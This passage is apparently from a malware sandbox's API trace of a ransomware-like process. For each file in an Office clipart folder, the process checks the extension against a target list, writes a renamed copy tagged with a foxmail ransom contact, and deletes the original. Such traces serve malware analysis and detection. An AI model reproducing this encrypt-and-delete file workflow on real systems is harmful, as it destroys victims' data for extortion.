[0053.454] lstrlenW (lpString=".zip") returned 4 [0053.454] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0053.454] lstrlenW (lpString=".rar") returned 4 [0053.454] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0053.454] lstrlenW (lpString=".bz2") returned 4 [0053.454] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0053.454] lstrlenW (lpString=".7z") returned 3 [0053.454] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0053.454] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00176_.GIF") returned 63 [0053.454] lstrlenW (lpString=".dbf") returned 4 [0053.454] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0053.454] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00176_.GIF") returned 63 [0053.454] lstrlenW (lpString=".1cd") returned 4 [0053.454] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0053.454] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00176_.GIF") returned 63 [0053.454] lstrlenW (lpString=".jpg") returned 4 [0053.454] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0053.719] GetFileSizeEx (in: hFile=0x220, lpFileSize=0x332ff1c | out: lpFileSize=0x332ff1c*=3026) returned 1 [0053.719] CloseHandle (hObject=0x220) returned 1 [0053.719] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00010_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00010_.wmf")) returned 0x20 [0053.720] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00010_.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00010_.wmf.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0053.720] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00010_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00010_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220 [0053.720] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.720] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.720] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00010_.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00010_.wmf.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e8 [0053.720] GetLastError () returned 0x0 [0053.720] ReadFile (in: hFile=0x220, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0xbd2, lpOverlapped=0x0) returned 1 [0054.289] WriteFile (in: hFile=0x1e8, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0xbe0, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0xbe0, lpOverlapped=0x0) returned 1 [0054.428] ReadFile (in: hFile=0x220, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x0, lpOverlapped=0x0) returned 1 [0054.428] WriteFile (in: hFile=0x1e8, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0xec, lpOverlapped=0x0) returned 1 [0054.428] SetEndOfFile (hFile=0x1e8) returned 1 [0054.428] CloseHandle (hObject=0x1e8) returned 1 [0054.428] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.428] SetEndOfFile (hFile=0x220) returned 1 [0054.429] CloseHandle (hObject=0x220) returned 1 [0054.429] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00010_.WMF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0054.429] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00010_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00010_.wmf")) returned 1 [0055.032] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00010_.WMF") returned 63 [0055.032] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00010_.WMF") returned 63 [0055.032] lstrlenW (lpString=".doc") returned 4 [0055.032] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0055.032] lstrlenW (lpString=".docx") returned 5 [0055.032] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0055.032] lstrlenW (lpString=".pdf") returned 4 [0055.032] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0055.032] lstrlenW (lpString=".xls") returned 4 [0055.032] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0055.032] lstrlenW (lpString=".xlsx") returned 5 [0055.032] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0055.032] lstrlenW (lpString=".ppt") returned 4 [0055.032] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0055.032] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00010_.WMF") returned 63 [0055.032] lstrlenW (lpString=".zip") returned 4 [0055.033] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0055.033] lstrlenW (lpString=".rar") returned 4 [0055.033] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0055.033] lstrlenW (lpString=".bz2") returned 4 [0055.033] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0055.033] lstrlenW (lpString=".7z") returned 3 [0055.033] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0055.033] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00010_.WMF") returned 63 [0055.033] lstrlenW (lpString=".dbf") returned 4 [0055.033] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0055.033] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00010_.WMF") returned 63 [0055.033] lstrlenW (lpString=".1cd") returned 4 [0055.033] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0055.033] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00010_.WMF") returned 63 [0055.033] lstrlenW (lpString=".jpg") returned 4 [0055.033] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0056.246] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.246] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.246] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00853_.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00853_.wmf.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0056.249] GetLastError () returned 0x0 [0056.249] ReadFile (in: hFile=0x1f0, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x5062, lpOverlapped=0x0) returned 1 [0056.253] WriteFile (in: hFile=0x204, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0x5070, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0x5070, lpOverlapped=0x0) returned 1 [0056.254] ReadFile (in: hFile=0x1f0, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x0, lpOverlapped=0x0) returned 1 [0056.254] WriteFile (in: hFile=0x204, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0xec, lpOverlapped=0x0) returned 1 [0056.254] SetEndOfFile (hFile=0x204) returned 1 [0056.254] CloseHandle (hObject=0x204) returned 1 [0056.254] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.255] SetEndOfFile (hFile=0x1f0) returned 1 [0056.256] CloseHandle (hObject=0x1f0) returned 1 [0056.256] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00853_.WMF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0056.256] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00853_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00853_.wmf")) returned 1 [0056.256] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00853_.WMF") returned 63 [0056.256] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00853_.WMF") returned 63 [0056.256] lstrlenW (lpString=".doc") returned 4 [0056.256] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0056.256] lstrlenW (lpString=".docx") returned 5 [0056.256] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0056.256] lstrlenW (lpString=".pdf") returned 4 [0056.256] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0056.256] lstrlenW (lpString=".xls") returned 4 [0056.256] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0056.256] lstrlenW (lpString=".xlsx") returned 5 [0056.256] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0056.256] lstrlenW (lpString=".ppt") returned 4 [0056.257] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0056.257] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00853_.WMF") returned 63 [0056.257] lstrlenW (lpString=".zip") returned 4 [0056.257] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0056.257] lstrlenW (lpString=".rar") returned 4 [0056.257] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0056.257] lstrlenW (lpString=".bz2") returned 4 [0056.257] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0056.257] lstrlenW (lpString=".7z") returned 3 [0056.257] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0056.257] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00853_.WMF") returned 63 [0056.257] lstrlenW (lpString=".dbf") returned 4 [0056.257] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0056.257] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00853_.WMF") returned 63 [0056.257] lstrlenW (lpString=".1cd") returned 4 [0056.257] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0056.257] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00853_.WMF") returned 63 [0056.257] lstrlenW (lpString=".jpg") returned 4 [0056.257] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0056.257] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.257] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.258] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00965_.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00965_.wmf.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0056.258] GetLastError () returned 0x0 [0056.258] ReadFile (in: hFile=0x1f0, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x1ba0, lpOverlapped=0x0) returned 1 [0056.259] WriteFile (in: hFile=0x204, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0x1bb0, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0x1bb0, lpOverlapped=0x0) returned 1 [0056.260] ReadFile (in: hFile=0x1f0, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x0, lpOverlapped=0x0) returned 1 [0056.260] WriteFile (in: hFile=0x204, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0xec, lpOverlapped=0x0) returned 1 [0056.260] SetEndOfFile (hFile=0x204) returned 1 [0056.260] CloseHandle (hObject=0x204) returned 1 [0056.261] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.261] SetEndOfFile (hFile=0x1f0) returned 1 [0056.261] CloseHandle (hObject=0x1f0) returned 1 [0056.262] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00965_.WMF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0056.262] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00965_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00965_.wmf")) returned 1 [0056.262] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00965_.WMF") returned 63 [0056.262] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00965_.WMF") returned 63 [0056.262] lstrlenW (lpString=".doc") returned 4 [0056.262] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0056.262] lstrlenW (lpString=".docx") returned 5 [0056.262] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0056.262] lstrlenW (lpString=".pdf") returned 4 [0056.262] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0056.262] lstrlenW (lpString=".xls") returned 4 [0056.262] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0056.262] lstrlenW (lpString=".xlsx") returned 5 [0056.262] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0056.262] lstrlenW (lpString=".ppt") returned 4 [0056.262] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0056.262] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00965_.WMF") returned 63 [0056.262] lstrlenW (lpString=".zip") returned 4 [0056.263] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0056.263] lstrlenW (lpString=".rar") returned 4 [0056.263] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0056.263] lstrlenW (lpString=".bz2") returned 4 [0056.263] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0056.263] lstrlenW (lpString=".7z") returned 3 [0056.263] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0056.263] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00965_.WMF") returned 63 [0056.263] lstrlenW (lpString=".dbf") returned 4 [0056.263] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0056.263] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00965_.WMF") returned 63 [0056.263] lstrlenW (lpString=".1cd") returned 4 [0056.263] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0056.263] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00965_.WMF") returned 63 [0056.263] lstrlenW (lpString=".jpg") returned 4 [0056.263] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0056.263] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.263] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.263] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01039_.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01039_.wmf.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0056.264] GetLastError () returned 0x0 [0056.264] ReadFile (in: hFile=0x1f0, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0xd10, lpOverlapped=0x0) returned 1 [0056.265] WriteFile (in: hFile=0x204, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0xd20, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0xd20, lpOverlapped=0x0) returned 1 [0056.266] ReadFile (in: hFile=0x1f0, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x0, lpOverlapped=0x0) returned 1 [0056.266] WriteFile (in: hFile=0x204, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0xec, lpOverlapped=0x0) returned 1 [0056.266] SetEndOfFile (hFile=0x204) returned 1 [0056.266] CloseHandle (hObject=0x204) returned 1 [0056.266] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.266] SetEndOfFile (hFile=0x1f0) returned 1 [0056.267] CloseHandle (hObject=0x1f0) returned 1 [0056.267] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01039_.WMF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0056.268] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01039_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01039_.wmf")) returned 1 [0056.268] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01039_.WMF") returned 63 [0056.268] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01039_.WMF") returned 63 [0056.268] lstrlenW (lpString=".doc") returned 4 [0056.268] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0056.268] lstrlenW (lpString=".docx") returned 5 [0056.268] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0056.268] lstrlenW (lpString=".pdf") returned 4 [0056.268] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0056.268] lstrlenW (lpString=".xls") returned 4 [0056.268] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0056.268] lstrlenW (lpString=".xlsx") returned 5 [0056.268] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0056.268] lstrlenW (lpString=".ppt") returned 4 [0056.268] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0056.268] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01039_.WMF") returned 63 [0056.268] lstrlenW (lpString=".zip") returned 4 [0056.268] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0056.268] lstrlenW (lpString=".rar") returned 4 [0056.268] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0056.268] lstrlenW (lpString=".bz2") returned 4 [0056.268] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0056.268] lstrlenW (lpString=".7z") returned 3 [0056.268] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0056.268] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01039_.WMF") returned 63 [0056.269] lstrlenW (lpString=".dbf") returned 4 [0056.269] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0056.269] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01039_.WMF") returned 63 [0056.269] lstrlenW (lpString=".1cd") returned 4 [0056.269] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0056.269] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01039_.WMF") returned 63 [0056.269] lstrlenW (lpString=".jpg") returned 4 [0056.269] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0056.269] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.269] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.269] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01044_.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01044_.wmf.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0056.269] GetLastError () returned 0x0 [0056.269] ReadFile (in: hFile=0x1f0, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x63c, lpOverlapped=0x0) returned 1 [0056.271] WriteFile (in: hFile=0x204, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0x640, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0x640, lpOverlapped=0x0) returned 1 [0056.272] ReadFile (in: hFile=0x1f0, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x0, lpOverlapped=0x0) returned 1 [0056.272] WriteFile (in: hFile=0x204, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0xec, lpOverlapped=0x0) returned 1 [0056.272] SetEndOfFile (hFile=0x204) returned 1 [0056.272] CloseHandle (hObject=0x204) returned 1 [0056.272] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.272] SetEndOfFile (hFile=0x1f0) returned 1 [0056.273] CloseHandle (hObject=0x1f0) returned 1 [0056.273] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01044_.WMF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0056.273] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01044_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01044_.wmf")) returned 1 [0056.274] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01044_.WMF") returned 63 [0056.274] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01044_.WMF") returned 63 [0056.274] lstrlenW (lpString=".doc") returned 4 [0056.274] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0056.274] lstrlenW (lpString=".docx") returned 5 [0056.274] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0056.274] lstrlenW (lpString=".pdf") returned 4 [0056.274] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0056.274] lstrlenW (lpString=".xls") returned 4 [0056.274] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0056.274] lstrlenW (lpString=".xlsx") returned 5 [0056.274] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0056.274] lstrlenW (lpString=".ppt") returned 4 [0056.274] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0056.274] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01044_.WMF") returned 63 [0056.274] lstrlenW (lpString=".zip") returned 4 [0056.274] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0056.274] lstrlenW (lpString=".rar") returned 4 [0056.274] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0056.274] lstrlenW (lpString=".bz2") returned 4 [0056.274] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0056.274] lstrlenW (lpString=".7z") returned 3 [0056.274] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0056.274] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01044_.WMF") returned 63 [0056.274] lstrlenW (lpString=".dbf") returned 4 [0056.274] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0056.274] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01044_.WMF") returned 63 [0056.274] lstrlenW (lpString=".1cd") returned 4 [0056.274] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0056.274] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01044_.WMF") returned 63 [0056.275] lstrlenW (lpString=".jpg") returned 4 [0056.275] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0056.275] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.275] SetFilePointerEx (in: 